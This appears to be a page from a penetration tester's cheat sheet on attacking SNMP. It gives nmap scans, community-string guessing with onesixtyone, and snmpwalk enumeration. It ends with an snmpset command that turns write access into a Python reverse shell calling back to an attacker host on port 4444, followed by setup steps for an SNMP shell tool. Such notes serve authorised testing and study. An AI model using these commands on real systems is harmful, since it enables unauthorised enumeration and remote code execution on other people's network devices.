search

SNMP

sudo nmap --script "snmp* and not snmp-brute" 192.168.X.X
sudo nmap -sU --open -p 161 192.168.50.1

echo public > community
echo private >> community
echo manager >> community
onesixtyone -c community -i ips

snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] 192.168.X.X
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] 192.168.X.X 1.3.6.1.2.1.4.34.1.3 #Get IPv6, needed dec2hex
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] 192.168.X.X NET-SNMP-EXTEND-MIB::nsExtendObjects #get extended
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] 192.168.X.X .1 #Enum all


#With right to write community, add revshell
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c [COMM_STRING] 192.168.X.X 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"192.168.X.X\",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'


#Same with script
sudo apt install snmp snmp-mibs-downloader rlwrap -y
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt
PreviousFTPNextSMTP

Last updated